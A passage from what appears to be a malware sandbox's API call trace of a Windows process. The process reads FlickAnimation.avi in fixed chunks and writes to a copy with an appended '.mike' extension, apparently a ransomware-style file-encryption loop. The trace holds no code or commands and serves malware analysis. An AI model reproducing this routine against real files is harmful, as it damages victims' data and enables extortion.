lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.172] GetFileType (hFile=0x264) returned 0x1 [0043.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.172] GetFileType (hFile=0x264) returned 0x1 [0043.172] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x70a20 [0043.172] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.173] GetFileType (hFile=0x264) returned 0x1 [0043.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.173] GetFileType (hFile=0x264) returned 0x1 [0043.173] ReadFile (in: hFile=0x264, lpBuffer=0x214c628, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x214c628*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.194] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.194] GetFileType (hFile=0x264) returned 0x1 [0043.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.194] GetFileType (hFile=0x264) returned 0x1 [0043.194] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x73220 [0043.194] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.195] GetFileType (hFile=0x264) returned 0x1 [0043.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.195] GetFileType (hFile=0x264) returned 0x1 [0043.195] ReadFile (in: hFile=0x264, lpBuffer=0x2159600, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2159600*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.197] GetFileType (hFile=0x264) returned 0x1 [0043.197] GetFileType (hFile=0x264) returned 0x1 [0043.197] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x75a20 [0043.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.197] GetFileType (hFile=0x264) returned 0x1 [0043.197] GetFileType (hFile=0x264) returned 0x1 [0043.198] ReadFile (in: hFile=0x264, lpBuffer=0x21665d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21665d8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.199] GetFileType (hFile=0x264) returned 0x1 [0043.199] GetFileType (hFile=0x264) returned 0x1 [0043.199] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x78220 [0043.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.199] GetFileType (hFile=0x264) returned 0x1 [0043.199] GetFileType (hFile=0x264) returned 0x1 [0043.199] ReadFile (in: hFile=0x264, lpBuffer=0x21735b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21735b0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.200] GetFileType (hFile=0x264) returned 0x1 [0043.201] GetFileType (hFile=0x264) returned 0x1 [0043.201] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7aa20 [0043.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.201] GetFileType (hFile=0x264) returned 0x1 [0043.201] GetFileType (hFile=0x264) returned 0x1 [0043.201] ReadFile (in: hFile=0x264, lpBuffer=0x2180588, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2180588*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.202] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.202] GetFileType (hFile=0x264) returned 0x1 [0043.202] GetFileType (hFile=0x264) returned 0x1 [0043.202] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7d220 [0043.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.203] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.203] GetFileType (hFile=0x264) returned 0x1 [0043.203] GetFileType (hFile=0x264) returned 0x1 [0043.203] ReadFile (in: hFile=0x264, lpBuffer=0x218d560, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218d560*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.205] GetFileType (hFile=0x264) returned 0x1 [0043.205] GetFileType (hFile=0x264) returned 0x1 [0043.205] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7fa20 [0043.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.206] GetFileType (hFile=0x264) returned 0x1 [0043.206] GetFileType (hFile=0x264) returned 0x1 [0043.206] ReadFile (in: hFile=0x264, lpBuffer=0x219a538, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x219a538*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.207] GetFileType (hFile=0x264) returned 0x1 [0043.207] GetFileType (hFile=0x264) returned 0x1 [0043.207] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x82220 [0043.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.208] GetFileType (hFile=0x264) returned 0x1 [0043.208] GetFileType (hFile=0x264) returned 0x1 [0043.208] ReadFile (in: hFile=0x264, lpBuffer=0x21a7510, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a7510*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.209] GetFileType (hFile=0x264) returned 0x1 [0043.209] GetFileType (hFile=0x264) returned 0x1 [0043.209] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x84a20 [0043.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.209] GetFileType (hFile=0x264) returned 0x1 [0043.210] GetFileType (hFile=0x264) returned 0x1 [0043.210] ReadFile (in: hFile=0x264, lpBuffer=0x21b44e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b44e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.211] GetFileType (hFile=0x264) returned 0x1 [0043.211] GetFileType (hFile=0x264) returned 0x1 [0043.211] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x87220 [0043.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.211] GetFileType (hFile=0x264) returned 0x1 [0043.211] GetFileType (hFile=0x264) returned 0x1 [0043.211] ReadFile (in: hFile=0x264, lpBuffer=0x21c14c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c14c0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.212] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.212] GetFileType (hFile=0x264) returned 0x1 [0043.212] GetFileType (hFile=0x264) returned 0x1 [0043.212] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x89a20 [0043.213] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.213] GetFileType (hFile=0x264) returned 0x1 [0043.213] GetFileType (hFile=0x264) returned 0x1 [0043.213] ReadFile (in: hFile=0x264, lpBuffer=0x21ce498, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21ce498*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.214] GetFileType (hFile=0x264) returned 0x1 [0043.214] GetFileType (hFile=0x264) returned 0x1 [0043.214] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x8c220 [0043.215] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.215] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.215] GetFileType (hFile=0x264) returned 0x1 [0043.215] GetFileType (hFile=0x264) returned 0x1 [0043.215] ReadFile (in: hFile=0x264, lpBuffer=0x21db470, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21db470*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.216] GetFileType (hFile=0x264) returned 0x1 [0043.216] GetFileType (hFile=0x264) returned 0x1 [0043.216] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x8ea20 [0043.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.217] GetFileType (hFile=0x264) returned 0x1 [0043.217] GetFileType (hFile=0x264) returned 0x1 [0043.217] ReadFile (in: hFile=0x264, lpBuffer=0x21e8448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21e8448*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, 